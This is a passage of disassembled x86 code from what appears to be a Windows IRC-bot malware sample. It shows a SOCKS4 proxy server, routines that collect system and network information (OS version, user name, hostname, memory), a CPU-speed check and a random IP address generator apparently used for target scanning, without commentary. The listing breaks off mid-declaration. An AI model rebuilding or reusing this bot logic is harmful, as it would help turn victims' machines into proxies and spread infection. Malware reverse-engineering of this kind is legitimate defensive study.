lea eax, [ebp+74h+var_4D4]
push eax
push dword_434344[esi]
call dword_433534 ; send
loc_40FA2F: ; CODE XREF: sub_40F8FA+210�j
push dword_434344[esi]
call dword_4335AC ; closesocket
push [ebp+74h+arg_0]
jmp loc_40FB1C
; ---------------------------------------------------------------------------
loc_40FA43: ; CODE XREF: sub_40F8FA+B1�j
; sub_40F8FA+E9�j
xor eax, eax
lea edi, [ebp+74h+var_1C]
stosd
stosd
stosd
stosd
mov ax, [ebp+74h+var_4D2]
push 6
mov [ebp+74h+var_1A], ax
mov eax, [ebp+74h+var_4D0]
push 1
push 2
mov [ebp+74h+var_1C], 2
mov [ebp+74h+var_18], eax
call dword_4334A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jnz short loc_40FA88
call dword_433558 ; WSAGetLastError
push eax
push offset aSocks4ErrorFai ; "[SOCKS4]: Error: Failed to open socket("...
jmp short loc_40FAA6
; ---------------------------------------------------------------------------
loc_40FA88: ; CODE XREF: sub_40F8FA+17E�j
push 10h
lea ecx, [ebp+74h+var_1C]
push ecx
push eax
call dword_433458 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40FABF
call dword_433558 ; WSAGetLastError
push eax
push offset aSocks4ErrorF_0 ; "[SOCKS4]: Error: Failed to connect to t"...
loc_40FAA6: ; CODE XREF: sub_40F8FA+18C�j
call sub_401CA7
pop ecx
pop ecx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Bh
jmp loc_40FA0A
; ---------------------------------------------------------------------------
loc_40FABF: ; CODE XREF: sub_40F8FA+19E�j
xor eax, eax
push ebx
mov [ebp+74h+var_4D4], bl
mov [ebp+74h+var_4D3], 5Ah
mov ecx, 100h
lea edi, [ebp+74h+var_4CC]
rep stosd
push 8
lea eax, [ebp+74h+var_4D4]
push eax
push dword_434344[esi]
call dword_433534 ; send
push dword_434344[esi]
push [ebp+74h+var_4]
call sub_40F7FD
pop ecx
pop ecx
push [ebp+74h+var_4]
call dword_4335AC ; closesocket
jmp loc_40FA2F
; ---------------------------------------------------------------------------
loc_40FB0F: ; CODE XREF: sub_40F8FA+8E�j
; sub_40F8FA+9B�j ...
push dword_434344[esi]
loc_40FB15: ; CODE XREF: sub_40F8FA+6E�j
call dword_4335AC ; closesocket
push edi
loc_40FB1C: ; CODE XREF: sub_40F8FA+144�j
call sub_4111AE
pop ecx
push ebx
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40F8FA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40FB2A proc near ; DATA XREF: sub_4078FA+494C�o
var_2D4 = byte ptr -2D4h
var_D4 = dword ptr -0D4h
var_D0 = byte ptr -0D0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 2D4h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 2Ch
pop ecx
xor ebx, ebx
lea edi, [ebp+74h+var_D4]
rep movsd
push [ebp+74h+var_40]
inc ebx
mov [eax+0A8h], ebx
xor eax, eax
lea edi, [ebp+74h+var_14]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_4], 10h
mov [ebp+74h+var_14], 2
call dword_4335EC ; ntohs
push 6
push ebx
xor esi, esi
push 2
mov [ebp+74h+var_12], ax
mov [ebp+74h+var_10], esi
call dword_4334A0 ; socket
mov edi, eax
mov eax, [ebp+74h+var_3C]
imul eax, 234h
mov dword_434344[eax], edi
push 10h
lea eax, [ebp+74h+var_14]
push eax
push edi
call dword_433578 ; bind
test eax, eax
jnz loc_40FCBB
push 0Ah
push edi
call dword_4335C0 ; listen
test eax, eax
jnz loc_40FCBB
push [ebp+74h+var_40]
push [ebp+74h+var_D4]
call sub_406C33
pop ecx
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ServerSt ; "[SOCKS4]: Server started on: %s:%d."
push eax
call sub_412BB5
add esp, 10h
cmp [ebp+74h+var_30], esi
jnz short loc_40FBF8
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4045DD
add esp, 14h
loc_40FBF8: ; CODE XREF: sub_40FB2A+B2�j
; sub_40FB2A+17A�j ...
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401C33
pop ecx
lea eax, [ebp+74h+var_4]
push eax
lea eax, [ebp+74h+var_24]
push eax
push edi
call dword_433464 ; accept
push [ebp+74h+var_3C]
mov ebx, eax
movzx eax, [ebp+74h+var_22]
push eax
push [ebp+74h+var_20]
mov [ebp+74h+var_28], esi
call dword_433520 ; inet_ntoa
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4ClientCo ; "[SOCKS4]: Client connection from IP: %s"...
push eax
call sub_412BB5
push ebx
lea eax, [ebp+74h+var_2D4]
push 12h
push eax
call sub_410EEA
mov ecx, [ebp+74h+var_3C]
mov [ebp+74h+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_43433C[eax], ecx
lea eax, [ebp+74h+arg_0]
push eax
push esi
lea eax, [ebp+74h+var_D4]
push eax
push offset sub_40F8FA
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+74h+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40FCB1
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_0 ; "[SOCKS4]: Failed to start client thread"...
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40FBF8
; ---------------------------------------------------------------------------
loc_40FCA9: ; CODE XREF: sub_40FB2A+18A�j
push 5
call ds:dword_41F000 ; Sleep
loc_40FCB1: ; CODE XREF: sub_40FB2A+15D�j
cmp [ebp+74h+var_28], esi
jz short loc_40FCA9
jmp loc_40FBF8
; ---------------------------------------------------------------------------
loc_40FCBB: ; CODE XREF: sub_40FB2A+77�j
; sub_40FB2A+88�j
push edi
call dword_4335AC ; closesocket
push [ebp+74h+var_40]
lea eax, [ebp+74h+var_2D4]
push offset aSocks4Failed_1 ; "[SOCKS4]: Failed to start server on Por"...
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+74h+var_30], esi
jnz short loc_40FCF8
push esi
push [ebp+74h+var_34]
lea eax, [ebp+74h+var_2D4]
push eax
lea eax, [ebp+74h+var_D0]
push eax
push [ebp+74h+var_D4]
call sub_4045DD
add esp, 14h
loc_40FCF8: ; CODE XREF: sub_40FB2A+1B2�j
lea eax, [ebp+74h+var_2D4]
push eax
call sub_401C33
push [ebp+74h+var_3C]
call sub_4111AE
pop ecx
pop ecx
push esi
call ds:dword_41F014 ; ExitThread
int 3 ; Trap to Debugger
sub_40FB2A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40FD16 proc near ; CODE XREF: sub_401000+74�p
; sub_4078FA+42B4�p ...
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset aDdDhDm ; "%dd %dh %dm"
push 32h
mov esi, offset dword_479E1C
push esi
call sub_412E0D
add esp, 18h
pop edi
mov eax, esi
pop esi
retn
sub_40FD16 endp
; =============== S U B R O U T I N E =======================================
sub_40FD69 proc near ; CODE XREF: sub_40FE1F+240�p
push ebx
push esi
push edi
mov edi, 0F4240h
loc_40FD71: ; CODE XREF: sub_40FD69+2F�j
; sub_40FD69+35�j
rdtsc
push 3E8h
mov ebx, edx
mov esi, eax
call ds:dword_41F000 ; Sleep
rdtsc
push 0
sub eax, esi
push edi
sbb edx, ebx
push edx
push eax
call sub_414600
mov esi, edx
test esi, esi
mov ebx, eax
ja short loc_40FD71
jb short loc_40FDA0
cmp ebx, edi
ja short loc_40FD71
loc_40FDA0: ; CODE XREF: sub_40FD69+31�j
push 0
push 64h
push esi
push ebx
call sub_414580
mov ecx, edx
push 64h
xor edx, edx
test ecx, ecx
mov edi, eax
pop eax
ja short loc_40FE13
jb short loc_40FDBF
cmp edi, 50h
jnb short loc_40FDC4
loc_40FDBF: ; CODE XREF: sub_40FD69+4F�j
push 4Bh
pop eax
xor edx, edx
loc_40FDC4: ; CODE XREF: sub_40FD69+54�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDCF
cmp edi, 47h
jnb short loc_40FDD4
loc_40FDCF: ; CODE XREF: sub_40FD69+5F�j
push 42h
pop eax
xor edx, edx
loc_40FDD4: ; CODE XREF: sub_40FD69+64�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDDF
cmp edi, 37h
jnb short loc_40FDE4
loc_40FDDF: ; CODE XREF: sub_40FD69+6F�j
push 32h
pop eax
xor edx, edx
loc_40FDE4: ; CODE XREF: sub_40FD69+74�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDEF
cmp edi, 26h
jnb short loc_40FDF4
loc_40FDEF: ; CODE XREF: sub_40FD69+7F�j
push 21h
pop eax
xor edx, edx
loc_40FDF4: ; CODE XREF: sub_40FD69+84�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FDFF
cmp edi, 1Eh
jnb short loc_40FE04
loc_40FDFF: ; CODE XREF: sub_40FD69+8F�j
push 19h
pop eax
xor edx, edx
loc_40FE04: ; CODE XREF: sub_40FD69+94�j
test ecx, ecx
ja short loc_40FE13
jb short loc_40FE0F
cmp edi, 0Ah
jnb short loc_40FE13
loc_40FE0F: ; CODE XREF: sub_40FD69+9F�j
xor eax, eax
xor edx, edx
loc_40FE13: ; CODE XREF: sub_40FD69+4D�j
; sub_40FD69+5D�j ...
sub eax, edi
sbb edx, ecx
add eax, ebx
pop edi
adc edx, esi
pop esi
pop ebx
retn
sub_40FD69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=70h
sub_40FE1F proc near ; CODE XREF: sub_4078FA+44AB�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-70h]
sub esp, 7E8h
push ebx
push esi
push edi
lea eax, [ebp+70h+var_CC]
push eax
mov [ebp+70h+var_4], 41FA76h
mov [ebp+70h+var_CC], 94h
call ds:dword_41F0F8 ; GetVersionExA
xor ebx, ebx
cmp [ebp+70h+var_C8], 4
jnz short loc_40FE90
cmp [ebp+70h+var_C4], ebx
jnz short loc_40FE72
cmp [ebp+70h+var_BC], 1
jnz short loc_40FE5F
mov [ebp+70h+var_4], offset a95 ; "95"
loc_40FE5F: ; CODE XREF: sub_40FE1F+37�j
cmp [ebp+70h+var_BC], 2
jnz loc_40FEF6
mov [ebp+70h+var_4], offset aNt ; "NT"
jmp short loc_40FECD
; ---------------------------------------------------------------------------
loc_40FE72: ; CODE XREF: sub_40FE1F+31�j
cmp [ebp+70h+var_C4], 0Ah
jnz short loc_40FE81
mov [ebp+70h+var_4], offset a98 ; "98"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FE81: ; CODE XREF: sub_40FE1F+57�j
cmp [ebp+70h+var_C4], 5Ah
jnz short loc_40FEC0
mov [ebp+70h+var_4], offset aMe_0 ; "ME"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FE90: ; CODE XREF: sub_40FE1F+2C�j
cmp [ebp+70h+var_C8], 5
jnz short loc_40FEC0
cmp [ebp+70h+var_C4], ebx
jnz short loc_40FEA4
mov [ebp+70h+var_4], offset a2k ; "2K"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FEA4: ; CODE XREF: sub_40FE1F+7A�j
cmp [ebp+70h+var_C4], 1
jnz short loc_40FEB3
mov [ebp+70h+var_4], offset aXp_0 ; "XP"
jmp short loc_40FEC7
; ---------------------------------------------------------------------------
loc_40FEB3: ; CODE XREF: sub_40FE1F+89�j
cmp [ebp+70h+var_C4], 2
mov [ebp+70h+var_4], offset a2003 ; "2003"
jz short loc_40FEC7
loc_40FEC0: ; CODE XREF: sub_40FE1F+66�j
; sub_40FE1F+75�j
mov [ebp+70h+var_4], offset a??? ; "???"
loc_40FEC7: ; CODE XREF: sub_40FE1F+60�j
; sub_40FE1F+6F�j ...
cmp [ebp+70h+var_BC], 2
jnz short loc_40FEF6
loc_40FECD: ; CODE XREF: sub_40FE1F+51�j
cmp [ebp+70h+var_B8], bl
jz short loc_40FEF6
lea eax, [ebp+70h+var_B8]
push eax
push [ebp+70h+var_4]
lea eax, [ebp+70h+var_2E8]
push offset aSS_4 ; "%s (%s)"
push eax
call sub_412BB5
lea eax, [ebp+70h+var_2E8]
add esp, 10h
mov [ebp+70h+var_4], eax
loc_40FEF6: ; CODE XREF: sub_40FE1F+44�j
; sub_40FE1F+AC�j ...
push 3Fh
pop ecx
xor eax, eax
mov [ebp+70h+var_25C], cx
lea edi, [ebp+70h+var_25A]
rep stosd
stosw
mov eax, dword_433530
cmp eax, ebx
mov [ebp+70h+var_C], 100h
jz short loc_40FF29
lea ecx, [ebp+70h+var_C]
push ecx
lea ecx, [ebp+70h+var_25C]
push ecx
call eax ; GetUserNameA
loc_40FF29: ; CODE XREF: sub_40FE1F+FB�j
push [ebp+70h+arg_4]
call sub_406C33
pop ecx
push eax
call dword_433514 ; inet_addr
push 2
mov [ebp+70h+var_8], eax
push 4
lea eax, [ebp+70h+var_8]
push eax
call dword_433590 ; gethostbyaddr
cmp eax, ebx
jz short loc_40FF52
push dword ptr [eax]
jmp short loc_40FF57
; ---------------------------------------------------------------------------
loc_40FF52: ; CODE XREF: sub_40FE1F+12D�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_40FF57: ; CODE XREF: sub_40FE1F+131�j
lea eax, [ebp+70h+var_3E4]
push eax
call sub_412BB5
pop ecx
pop ecx
push 104h
lea eax, [ebp+70h+var_4E8]
push eax
call ds:dword_41F040 ; GetSystemDirectoryA
push 46h
lea eax, [ebp+70h+var_114]
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
push ebx
mov esi, 409h
push esi
call ds:dword_41F068 ; GetDateFormatA
push 46h
lea eax, [ebp+70h+var_15C]
push eax
push offset aHhMmSs ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_41F064 ; GetTimeFormatA
push 8
pop ecx
xor eax, eax
lea edi, [ebp+70h+var_38]
rep stosd
lea eax, [ebp+70h+var_38]
push eax
call ds:dword_41F108 ; GlobalMemoryStatus
push ebx
push ebx
push ebx
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
call sub_4141AD
lea eax, [ebp+70h+var_18]
push eax
lea eax, [ebp+70h+var_7E8]
push eax
call sub_40253D
push 60h
pop ecx
mov esi, eax
lea edi, [ebp+70h+var_668]
push ebx
rep movsd
call sub_40FD16
add esp, 20h
push eax
lea eax, [ebp+70h+var_15C]
push eax
lea eax, [ebp+70h+var_114]
push eax
lea eax, [ebp+70h+var_25C]
push eax
push [ebp+70h+arg_4]
call sub_406C33
pop ecx
push eax
lea eax, [ebp+70h+var_3E4]
push eax
lea eax, [ebp+70h+var_4E8]
push eax
push [ebp+70h+var_C0]
lea eax, [ebp+70h+var_5E8]
push [ebp+70h+var_C4]
push [ebp+70h+var_C8]
push [ebp+70h+var_4]
push eax
lea eax, [ebp+70h+var_568]
push eax
mov eax, [ebp+70h+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_402439
pop ecx
pop ecx
push eax
mov eax, [ebp+70h+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_402439
pop ecx
pop ecx
push eax
call sub_40FD69
push edx
push eax
push offset aSysinfoCpuI64u ; "[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
push 200h
push [ebp+70h+arg_0]
call sub_412E0D
mov eax, [ebp+70h+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
add ebp, 70h
leave
retn
sub_40FE1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_410086 proc near ; CODE XREF: sub_4078FA+33AE�p
; sub_4078FA+44DA�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push edi
push 20h
pop ecx
xor eax, eax
cmp dword_433618, eax
lea edi, [ebp+6Ch+var_8C]
rep stosd
pop edi
jnz short loc_4100EC
push eax
push 80h
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_C]
push eax
call dword_4335E8 ; InternetGetConnectedStateExA
test eax, eax
jnz short loc_4100CD
lea eax, [ebp+6Ch+var_8C]
push offset dword_4271BC
push eax
call sub_412BB5
pop ecx
pop ecx
loc_4100CD: ; CODE XREF: sub_410086+35�j
test [ebp+6Ch+var_C], 1
lea eax, [ebp+6Ch+var_8]
jz short loc_4100E5
push offset dword_4271B4
loc_4100DB: ; CODE XREF: sub_410086+64�j
push eax
call sub_412BB5
pop ecx
pop ecx
jmp short loc_41010A
; ---------------------------------------------------------------------------
loc_4100E5: ; CODE XREF: sub_410086+4E�j
push offset dword_4271B0
jmp short loc_4100DB
; ---------------------------------------------------------------------------
loc_4100EC: ; CODE XREF: sub_410086+1D�j
push esi
mov esi, offset off_4271AC
lea eax, [ebp+6Ch+var_8]
push esi
push eax
call sub_412BB5
lea eax, [ebp+6Ch+var_8C]
push esi
push eax
call sub_412BB5
add esp, 10h
pop esi
loc_41010A: ; CODE XREF: sub_410086+5D�j
push [ebp+6Ch+arg_4]
push [ebp+6Ch+arg_8]
call sub_406C33
pop ecx
push eax
lea eax, [ebp+6Ch+var_8C]
push eax
lea eax, [ebp+6Ch+var_8]
push eax
push offset aNetinfoTypeSS_ ; "[NETINFO]: [Type]: %s (%s). [IP Address"...
push 200h
push [ebp+6Ch+arg_0]
call sub_412E0D
mov eax, [ebp+6Ch+arg_0]
add esp, 1Ch
add ebp, 6Ch
leave
retn
sub_410086 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41013C proc near ; CODE XREF: sub_401525+71�p
; sub_410408+1C�p
var_E4 = word ptr -0E4h
var_E2 = word ptr -0E2h
var_E0 = word ptr -0E0h
var_DE = word ptr -0DEh
var_DC = word ptr -0DCh
var_DA = word ptr -0DAh
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = word ptr -0C4h
var_C2 = word ptr -0C2h
var_C0 = word ptr -0C0h
var_BE = word ptr -0BEh
var_BC = word ptr -0BCh
var_BA = word ptr -0BAh
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = word ptr -0B4h
var_B2 = word ptr -0B2h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = word ptr -0ACh
var_AA = word ptr -0AAh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = word ptr -0A4h
var_A2 = word ptr -0A2h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = word ptr -94h
var_92 = word ptr -92h
var_90 = word ptr -90h
var_8E = word ptr -8Eh
var_8C = word ptr -8Ch
var_8A = word ptr -8Ah
var_88 = word ptr -88h
var_86 = word ptr -86h
var_84 = word ptr -84h
var_82 = word ptr -82h
var_80 = word ptr -80h
var_7E = word ptr -7Eh
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = word ptr -70h
var_6E = word ptr -6Eh
var_6C = word ptr -6Ch
var_6A = word ptr -6Ah
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0E4h
xor eax, eax
mov [ebp+74h+var_E4], ax
mov [ebp+74h+var_E2], 1
mov [ebp+74h+var_E0], 2
mov [ebp+74h+var_DE], 5
mov [ebp+74h+var_DC], 7
mov [ebp+74h+var_DA], 0Bh
mov [ebp+74h+var_D8], 17h
mov [ebp+74h+var_D6], 1Bh
mov [ebp+74h+var_D4], 1Fh
mov [ebp+74h+var_D2], 24h
mov [ebp+74h+var_D0], 25h
mov [ebp+74h+var_CE], 27h
mov [ebp+74h+var_CC], 29h
mov [ebp+74h+var_CA], 2Ah
mov [ebp+74h+var_C8], 31h
mov [ebp+74h+var_C6], 32h
mov [ebp+74h+var_C4], 49h
mov [ebp+74h+var_C2], 4Ah
mov [ebp+74h+var_C0], 4Bh
mov [ebp+74h+var_BE], 4Ch
mov [ebp+74h+var_BC], 4Dh
mov [ebp+74h+var_BA], 4Eh
mov [ebp+74h+var_B8], 4Fh
mov [ebp+74h+var_B6], 59h
mov [ebp+74h+var_B4], 5Ah
mov [ebp+74h+var_B2], 5Bh
mov [ebp+74h+var_B0], 5Ch
mov [ebp+74h+var_AE], 5Dh
mov [ebp+74h+var_AC], 5Eh
mov [ebp+74h+var_AA], 5Fh
mov [ebp+74h+var_A8], 60h
mov [ebp+74h+var_A6], 61h
mov [ebp+74h+var_A4], 62h
mov [ebp+74h+var_A2], 63h
mov [ebp+74h+var_A0], 64h
mov [ebp+74h+var_9E], 65h
mov [ebp+74h+var_9C], 66h
mov [ebp+74h+var_9A], 67h
mov [ebp+74h+var_98], 68h
mov [ebp+74h+var_96], 69h
mov [ebp+74h+var_94], 6Ah
mov [ebp+74h+var_92], 6Bh
mov [ebp+74h+var_90], 6Ch
mov [ebp+74h+var_8E], 6Dh
mov [ebp+74h+var_8C], 6Eh
mov [ebp+74h+var_8A], 6Fh
mov [ebp+74h+var_88], 70h
mov [ebp+74h+var_86], 71h
mov [ebp+74h+var_84], 72h
mov [ebp+74h+var_82], 73h
mov [ebp+74h+var_80], 74h
mov [ebp+74h+var_7E], 75h
mov [ebp+74h+var_7C], 76h
mov [ebp+74h+var_7A], 77h
mov [ebp+74h+var_78], 78h
mov [ebp+74h+var_76], 79h
mov [ebp+74h+var_74], 7Ah
mov [ebp+74h+var_72], 7Bh
mov [ebp+74h+var_70], 7Ch
mov [ebp+74h+var_6E], 7Dh
mov [ebp+74h+var_6C], 7Eh
mov [ebp+74h+var_6A], 7Fh
mov [ebp+74h+var_68], 0ADh
mov [ebp+74h+var_66], 0AEh
mov [ebp+74h+var_64], 0AFh
mov [ebp+74h+var_62], 0B0h
mov [ebp+74h+var_60], 0B1h
mov [ebp+74h+var_5E], 0B2h
mov [ebp+74h+var_5C], 0B3h
mov [ebp+74h+var_5A], 0B4h
mov [ebp+74h+var_58], 0B5h
mov [ebp+74h+var_56], 0B6h
mov [ebp+74h+var_54], 0B7h
mov [ebp+74h+var_52], 0B8h
mov [ebp+74h+var_50], 0B9h
mov [ebp+74h+var_4E], 0BAh
mov [ebp+74h+var_4C], 0BBh
mov [ebp+74h+var_4A], 0BDh
mov [ebp+74h+var_48], 0BEh
mov [ebp+74h+var_46], 0C5h
mov [ebp+74h+var_44], 0DFh
mov [ebp+74h+var_42], 0E0h
mov [ebp+74h+var_40], 0E1h
mov [ebp+74h+var_3E], 0E2h
mov [ebp+74h+var_3C], 0E3h
mov [ebp+74h+var_3A], 0E4h
mov [ebp+74h+var_38], 0E5h
mov [ebp+74h+var_36], 0E6h
mov [ebp+74h+var_34], 0E7h
mov [ebp+74h+var_32], 0E8h
mov [ebp+74h+var_30], 0E9h
mov [ebp+74h+var_2E], 0EAh
mov [ebp+74h+var_2C], 0EBh
mov [ebp+74h+var_2A], 0ECh
mov [ebp+74h+var_28], 0EDh
mov [ebp+74h+var_26], 0EEh
mov [ebp+74h+var_24], 0EFh
mov [ebp+74h+var_22], 0F0h
mov [ebp+74h+var_20], 0F1h
mov [ebp+74h+var_1E], 0F2h
mov [ebp+74h+var_1C], 0F3h
mov [ebp+74h+var_1A], 0F4h
mov [ebp+74h+var_18], 0F5h
mov [ebp+74h+var_16], 0F6h
mov [ebp+74h+var_14], 0F7h
mov [ebp+74h+var_12], 0F8h
mov [ebp+74h+var_10], 0F9h
mov [ebp+74h+var_E], 0FAh
mov [ebp+74h+var_C], 0FBh
mov [ebp+74h+var_A], 0FCh
mov [ebp+74h+var_8], 0FDh
mov [ebp+74h+var_6], 0FEh
mov [ebp+74h+var_4], 0FFh
loc_4103ED: ; CODE XREF: sub_41013C+2BF�j
movsx ecx, [ebp+eax*2+74h+var_E4]
cmp [ebp+74h+arg_0], ecx
jz short loc_410404
inc eax
cmp eax, 71h
jb short loc_4103ED
xor al, al
loc_4103FF: ; CODE XREF: sub_41013C+2CA�j
add ebp, 74h
leave
retn
; ---------------------------------------------------------------------------
loc_410404: ; CODE XREF: sub_41013C+2B9�j
mov al, 1
jmp short loc_4103FF
sub_41013C endp
; =============== S U B R O U T I N E =======================================
sub_410408 proc near ; CODE XREF: sub_41046C+1B9�p
push ebx
push esi
push edi
call sub_412D71
mov edi, 0FFh
jmp short loc_41041C
; ---------------------------------------------------------------------------
loc_410417: ; CODE XREF: sub_410408+24�j
call sub_412D71
loc_41041C: ; CODE XREF: sub_410408+D�j
cdq
mov ecx, edi
idiv ecx
mov esi, edx
push esi
call sub_41013C
test al, al
pop ecx
jnz short loc_410417
call sub_412D71
cdq
mov edi, 100h
mov ecx, edi
idiv ecx
mov ebx, edx
call sub_412D71
cdq
idiv edi
mov edi, edx
call sub_412D71
cdq
mov ecx, 0FEh
idiv ecx
mov eax, edx
inc eax
shl eax, 8
add eax, edi
shl eax, 8
add eax, ebx
shl eax, 8
pop edi
add eax, esi
pop esi
pop ebx
retn
sub_410408 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_41046C proc near ; DATA XREF: sub_4078FA+4F6D�o
var_13B0 = word ptr -13B0h
var_BE0 = byte ptr -0BE0h
var_BDF = byte ptr -0BDFh
var_BCC = byte ptr -0BCCh
var_BC0 = byte ptr -0BC0h
var_BB8 = byte ptr -0BB8h
var_410 = byte ptr -410h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5F = byte ptr -5Fh
var_5E = word ptr -5Eh
var_5C = byte ptr -5Ch
var_48 = qword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = byte ptr -28h
